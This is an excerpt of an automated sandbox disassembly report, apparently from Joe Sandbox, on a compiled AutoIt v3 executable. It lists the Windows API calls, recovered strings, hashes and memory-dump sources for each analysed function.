                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                • String ID:
                                                • API String ID: 1996641542-0
                                                • Opcode ID: 71b0b5b22cc56f35b8c64686188a00b16cbe659980c1ac0c97721c389c99da90
                                                • Instruction ID: d23ca42d2a6cf44e9bc8347ae7c1fa9b4c656b4b0a0de5cbd122187eb0ca999e
                                                • Opcode Fuzzy Hash: 71b0b5b22cc56f35b8c64686188a00b16cbe659980c1ac0c97721c389c99da90
                                                • Instruction Fuzzy Hash: D1513B71900208AFDB209FA8DC49EAEBBB9FF08321F204555F915AB2E1DB759A41CF50
                                                APIs
                                                • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00B0B7B0
                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00B0B7C1
                                                • CharNextW.USER32(0000014E), ref: 00B0B7F0
                                                • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00B0B831
                                                • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00B0B847
                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00B0B858
                                                • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00B0B875
                                                • SetWindowTextW.USER32(?,0000014E), ref: 00B0B8C7
                                                • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00B0B8DD
                                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 00B0B90E
                                                • _memset.LIBCMT ref: 00B0B933
                                                • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00B0B97C
                                                • _memset.LIBCMT ref: 00B0B9DB
                                                • SendMessageW.USER32 ref: 00B0BA05
                                                • SendMessageW.USER32(?,00001074,?,00000001), ref: 00B0BA5D
                                                • SendMessageW.USER32(?,0000133D,?,?), ref: 00B0BB0A
                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 00B0BB2C
                                                • GetMenuItemInfoW.USER32(?), ref: 00B0BB76
                                                • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00B0BBA3
                                                • DrawMenuBar.USER32(?), ref: 00B0BBB2
                                                • SetWindowTextW.USER32(?,0000014E), ref: 00B0BBDA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                • String ID: 0
                                                • API String ID: 1073566785-4108050209
                                                • Opcode ID: 9e72f2b2a0b3a43c4c40e7b064e9e365bca2754e5643f51453fe040038447733
                                                • Instruction ID: 7bebb5393bb08f4c1456e543903103170cb4012e204965740fe81af0da759478
                                                • Opcode Fuzzy Hash: 9e72f2b2a0b3a43c4c40e7b064e9e365bca2754e5643f51453fe040038447733
                                                • Instruction Fuzzy Hash: 38E15975900219ABDF219F65CC84EEE7FB8FF05714F14819AF919AA2D0DB748A81CF60
                                                APIs
                                                • GetCursorPos.USER32(?), ref: 00B0778A
                                                • GetDesktopWindow.USER32 ref: 00B0779F
                                                • GetWindowRect.USER32(00000000), ref: 00B077A6
                                                • GetWindowLongW.USER32(?,000000F0), ref: 00B07808
                                                • DestroyWindow.USER32(?), ref: 00B07834
                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00B0785D
                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00B0787B
                                                • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00B078A1
                                                • SendMessageW.USER32(?,00000421,?,?), ref: 00B078B6
                                                • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00B078C9
                                                • IsWindowVisible.USER32(?), ref: 00B078E9
                                                • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00B07904
                                                • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00B07918
                                                • GetWindowRect.USER32(?,?), ref: 00B07930
                                                • MonitorFromPoint.USER32(?,?,00000002), ref: 00B07956
                                                • GetMonitorInfoW.USER32 ref: 00B07970
                                                • CopyRect.USER32(?,?), ref: 00B07987
                                                • SendMessageW.USER32(?,00000412,00000000), ref: 00B079F2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                • String ID: ($0$tooltips_class32
                                                • API String ID: 698492251-4156429822
                                                • Opcode ID: a0d2f7607e90a1a32b528ddd6117051087247c3a58f7f30c17fba66c093d4519
                                                • Instruction ID: 0b44fd1e1b9292a0065d3d7b105f8aafab6e2290b82fe5f45890d963bd4045ba
                                                • Opcode Fuzzy Hash: a0d2f7607e90a1a32b528ddd6117051087247c3a58f7f30c17fba66c093d4519
                                                • Instruction Fuzzy Hash: 6BB16B71A08300AFDB14DF65C988B6AFBE5FF88310F00895DF5999B291DB70E805CB92
                                                APIs
                                                • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00AE6CFB
                                                • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00AE6D21
                                                • _wcscpy.LIBCMT ref: 00AE6D4F
                                                • _wcscmp.LIBCMT ref: 00AE6D5A
                                                • _wcscat.LIBCMT ref: 00AE6D70
                                                • _wcsstr.LIBCMT ref: 00AE6D7B
                                                • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00AE6D97
                                                • _wcscat.LIBCMT ref: 00AE6DE0
                                                • _wcscat.LIBCMT ref: 00AE6DE7
                                                • _wcsncpy.LIBCMT ref: 00AE6E12
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                • API String ID: 699586101-1459072770
                                                • Opcode ID: 243b2cad6a3cbdd696fb9d41187c932da6d96cb14b096410e914540e1cf7319e
                                                • Instruction ID: 49a619ac5930026df8a156a2d9574363c2e38234333a08a45fc00319431b55f6
                                                • Opcode Fuzzy Hash: 243b2cad6a3cbdd696fb9d41187c932da6d96cb14b096410e914540e1cf7319e
                                                • Instruction Fuzzy Hash: 7A413672A04240BFEB10AB75CE43FFF77BCEF55750F140469F901A2192EB749A0186A5
                                                APIs
                                                • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00ABA939
                                                • GetSystemMetrics.USER32(00000007), ref: 00ABA941
                                                • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00ABA96C
                                                • GetSystemMetrics.USER32(00000008), ref: 00ABA974
                                                • GetSystemMetrics.USER32(00000004), ref: 00ABA999
                                                • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00ABA9B6
                                                • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 00ABA9C6
                                                • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00ABA9F9
                                                • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00ABAA0D
                                                • GetClientRect.USER32(00000000,000000FF), ref: 00ABAA2B
                                                • GetStockObject.GDI32(00000011), ref: 00ABAA47
                                                • SendMessageW.USER32(00000000,00000030,00000000), ref: 00ABAA52
                                                  • Part of subcall function 00ABB63C: GetCursorPos.USER32(000000FF), ref: 00ABB64F
                                                  • Part of subcall function 00ABB63C: ScreenToClient.USER32(00000000,000000FF), ref: 00ABB66C
                                                  • Part of subcall function 00ABB63C: GetAsyncKeyState.USER32(00000001), ref: 00ABB691
                                                  • Part of subcall function 00ABB63C: GetAsyncKeyState.USER32(00000002), ref: 00ABB69F
                                                • SetTimer.USER32(00000000,00000000,00000028,00ABAB87), ref: 00ABAA79
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                • String ID: AutoIt v3 GUI
                                                • API String ID: 1458621304-248962490
                                                • Opcode ID: 7d970fe918d1e0c480cc4039bd5b9b06b70c4006784d57553f3856be16a0e2bd
                                                • Instruction ID: e40f17e08a8b055c1613d150eb20aa68b0642e37dfcad02854ae2aa0b15e6e36
                                                • Opcode Fuzzy Hash: 7d970fe918d1e0c480cc4039bd5b9b06b70c4006784d57553f3856be16a0e2bd
                                                • Instruction Fuzzy Hash: EBB17C75A0020AAFDB14DFA8DC45BEE7BB8FB18314F154219FA15A72E0DB74E841CB61
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: Window$Foreground
                                                • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                • API String ID: 62970417-1919597938
                                                • Opcode ID: 0502d3c1e94370b0287b00bdcf23c1ee664c64e476d52721abfa2f152970935e
                                                • Instruction ID: f93ee5985e3711cf0afb9e7b068d5e6d4ee92921cd6d9c55fe2f8e242a44c9ab
                                                • Opcode Fuzzy Hash: 0502d3c1e94370b0287b00bdcf23c1ee664c64e476d52721abfa2f152970935e
                                                • Instruction Fuzzy Hash: 3ED1B231104242AFCB04EF20C981ADEBBF4FF56340F504A99F456975A2DB30E9AADBD1
                                                APIs
                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B03735
                                                • RegCreateKeyExW.ADVAPI32(?,?,00000000,00B3DC00,00000000,?,00000000,?,?), ref: 00B037A3
                                                • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00B037EB
                                                • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00B03874
                                                • RegCloseKey.ADVAPI32(?), ref: 00B03B94
                                                • RegCloseKey.ADVAPI32(00000000), ref: 00B03BA1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: Close$ConnectCreateRegistryValue
                                                • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                • API String ID: 536824911-966354055
                                                • Opcode ID: 79db9799df8598cca640af473c340ccdf3be5bf4e6913c12092ddcdb9091a0c1
                                                • Instruction ID: 4bb81b67ac325065b19f8148df71af8f782e3084fd10bf04c76359a2b50c2f31
                                                • Opcode Fuzzy Hash: 79db9799df8598cca640af473c340ccdf3be5bf4e6913c12092ddcdb9091a0c1
                                                • Instruction Fuzzy Hash: D7024A752046019FCB14EF14C995E2ABBE9FF89720F04849DF99A9B3A1CB30ED41CB91
                                                APIs
                                                • CharUpperBuffW.USER32(?,?), ref: 00B06C56
                                                • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00B06D16
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: BuffCharMessageSendUpper
                                                • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                • API String ID: 3974292440-719923060
                                                • Opcode ID: 668cfb9009e51387143b6513fa6b69565815c9eef6a66e7dc6dae0500d63e6f3
                                                • Instruction ID: 8d1228bfdbf0c99ed77957dfee1e4da06b04d9e7070eca94e243881f7dcd227b
                                                • Opcode Fuzzy Hash: 668cfb9009e51387143b6513fa6b69565815c9eef6a66e7dc6dae0500d63e6f3
                                                • Instruction Fuzzy Hash: 78A160702143419FCB14EF14CA91BAABBE5FF45314F1449A9B8A65B3D2DB30EC1ACB91
                                                APIs
                                                • GetClassNameW.USER32(?,?,00000100), ref: 00ADCF91
                                                • __swprintf.LIBCMT ref: 00ADD032
                                                • _wcscmp.LIBCMT ref: 00ADD045
                                                • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00ADD09A
                                                • _wcscmp.LIBCMT ref: 00ADD0D6
                                                • GetClassNameW.USER32(?,?,00000400), ref: 00ADD10D
                                                • GetDlgCtrlID.USER32(?), ref: 00ADD15F
                                                • GetWindowRect.USER32(?,?), ref: 00ADD195
                                                • GetParent.USER32(?), ref: 00ADD1B3
                                                • ScreenToClient.USER32(00000000), ref: 00ADD1BA
                                                • GetClassNameW.USER32(?,?,00000100), ref: 00ADD234
                                                • _wcscmp.LIBCMT ref: 00ADD248
                                                • GetWindowTextW.USER32(?,?,00000400), ref: 00ADD26E
                                                • _wcscmp.LIBCMT ref: 00ADD282
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
                                                • String ID: %s%u
                                                • API String ID: 3119225716-679674701
                                                • Opcode ID: 0c018a48b1b98cdd17b364cf8c75c635065167e2c1512bc9accfe019eefd3a9a
                                                • Instruction ID: f5c2a7d549efe774584daf234cf6e64ee5f910e36e7fa7897004c8156efbb17f
                                                • Opcode Fuzzy Hash: 0c018a48b1b98cdd17b364cf8c75c635065167e2c1512bc9accfe019eefd3a9a
                                                • Instruction Fuzzy Hash: 9FA1C571604306AFD715DF64C984FEAB7A8FF48354F00861AF99AD3291DB30EA46CB91
                                                APIs
                                                • GetClassNameW.USER32(00000008,?,00000400), ref: 00ADD8EB
                                                • _wcscmp.LIBCMT ref: 00ADD8FC
                                                • GetWindowTextW.USER32(00000001,?,00000400), ref: 00ADD924
                                                • CharUpperBuffW.USER32(?,00000000), ref: 00ADD941
                                                • _wcscmp.LIBCMT ref: 00ADD95F
                                                • _wcsstr.LIBCMT ref: 00ADD970
                                                • GetClassNameW.USER32(00000018,?,00000400), ref: 00ADD9A8
                                                • _wcscmp.LIBCMT ref: 00ADD9B8
                                                • GetWindowTextW.USER32(00000002,?,00000400), ref: 00ADD9DF
                                                • GetClassNameW.USER32(00000018,?,00000400), ref: 00ADDA28
                                                • _wcscmp.LIBCMT ref: 00ADDA38
                                                • GetClassNameW.USER32(00000010,?,00000400), ref: 00ADDA60
                                                • GetWindowRect.USER32(00000004,?), ref: 00ADDAC9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                • String ID: @$ThumbnailClass
                                                • API String ID: 1788623398-1539354611
                                                • Opcode ID: 117d5984189ed55b8b961ac4917d3a7aef8c0ec61bf390755ac7f47b52650c84
                                                • Instruction ID: 7aea8291a610044ef72ee82f857430c57d6fa4d63ae30a5861736defd77dd755
                                                • Opcode Fuzzy Hash: 117d5984189ed55b8b961ac4917d3a7aef8c0ec61bf390755ac7f47b52650c84
                                                • Instruction Fuzzy Hash: 0481CE311083059BDB11DF10C985FAA7BE8FF85358F04846BFD8A9A296DB34DD46CBA1
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: __wcsnicmp
                                                • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                • API String ID: 1038674560-1810252412
                                                • Opcode ID: 1168c0c225e862cb4749c6ed4d01c1513bf8b511ef935a6ed9b36c1e4f1271b2
                                                • Instruction ID: db5752c986e2b29020f2177210701811a74433bef351cabf0142bb8d10270770
                                                • Opcode Fuzzy Hash: 1168c0c225e862cb4749c6ed4d01c1513bf8b511ef935a6ed9b36c1e4f1271b2
                                                • Instruction Fuzzy Hash: 24314F31A44205E6EB15FB60DE53FEDB3B49F22755F2001AAF842B21E2EB51AE08D651
                                                APIs
                                                • LoadIconW.USER32(00000063), ref: 00ADEAB0
                                                • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00ADEAC2
                                                • SetWindowTextW.USER32(?,?), ref: 00ADEAD9
                                                • GetDlgItem.USER32(?,000003EA), ref: 00ADEAEE
                                                • SetWindowTextW.USER32(00000000,?), ref: 00ADEAF4
                                                • GetDlgItem.USER32(?,000003E9), ref: 00ADEB04
                                                • SetWindowTextW.USER32(00000000,?), ref: 00ADEB0A
                                                • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00ADEB2B
                                                • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00ADEB45
                                                • GetWindowRect.USER32(?,?), ref: 00ADEB4E
                                                • SetWindowTextW.USER32(?,?), ref: 00ADEBB9
                                                • GetDesktopWindow.USER32 ref: 00ADEBBF
                                                • GetWindowRect.USER32(00000000), ref: 00ADEBC6
                                                • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00ADEC12
                                                • GetClientRect.USER32(?,?), ref: 00ADEC1F
                                                • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00ADEC44
                                                • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00ADEC6F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                • String ID:
                                                • API String ID: 3869813825-0
                                                • Opcode ID: 32638007cd2d3df63527035054be4ac7b839162d415362028929d4f6cfe35c71
                                                • Instruction ID: 285d68be3abd5ec628e13fee51fe75bb1549e158240667003476b5f0168113d9
                                                • Opcode Fuzzy Hash: 32638007cd2d3df63527035054be4ac7b839162d415362028929d4f6cfe35c71
                                                • Instruction Fuzzy Hash: 03516B71900709AFDB21EFA8CD89A6EBBF5FF04705F00491AE597A76A0CB74B905CB10
                                                APIs
                                                • LoadCursorW.USER32(00000000,00007F8A), ref: 00AF79C6
                                                • LoadCursorW.USER32(00000000,00007F00), ref: 00AF79D1
                                                • LoadCursorW.USER32(00000000,00007F03), ref: 00AF79DC
                                                • LoadCursorW.USER32(00000000,00007F8B), ref: 00AF79E7
                                                • LoadCursorW.USER32(00000000,00007F01), ref: 00AF79F2
                                                • LoadCursorW.USER32(00000000,00007F81), ref: 00AF79FD
                                                • LoadCursorW.USER32(00000000,00007F88), ref: 00AF7A08
                                                • LoadCursorW.USER32(00000000,00007F80), ref: 00AF7A13
                                                • LoadCursorW.USER32(00000000,00007F86), ref: 00AF7A1E
                                                • LoadCursorW.USER32(00000000,00007F83), ref: 00AF7A29
                                                • LoadCursorW.USER32(00000000,00007F85), ref: 00AF7A34
                                                • LoadCursorW.USER32(00000000,00007F82), ref: 00AF7A3F
                                                • LoadCursorW.USER32(00000000,00007F84), ref: 00AF7A4A
                                                • LoadCursorW.USER32(00000000,00007F04), ref: 00AF7A55
                                                • LoadCursorW.USER32(00000000,00007F02), ref: 00AF7A60
                                                • LoadCursorW.USER32(00000000,00007F89), ref: 00AF7A6B
                                                • GetCursorInfo.USER32(?), ref: 00AF7A7B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: Cursor$Load$Info
                                                • String ID:
                                                • API String ID: 2577412497-0
                                                • Opcode ID: 5ff15a5444768c999f7c3f6eef61721b824c68244d4c3b56f4022b410f0e17c2
                                                • Instruction ID: 840a24c8aa27a78d43ccde177289d3ec49b585728b37c2e8ca1721c8188ff2a5
                                                • Opcode Fuzzy Hash: 5ff15a5444768c999f7c3f6eef61721b824c68244d4c3b56f4022b410f0e17c2
                                                • Instruction Fuzzy Hash: B63117B0D0831E6ADB509FF68C8996FBFF8FF04750F504526A50DE7280DA78A5018F91
                                                APIs
                                                  • Part of subcall function 00ABE968: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00AAC8B7,?,00002000,?,?,00000000,?,00AA419E,?,?,?,00B3DC00), ref: 00ABE984
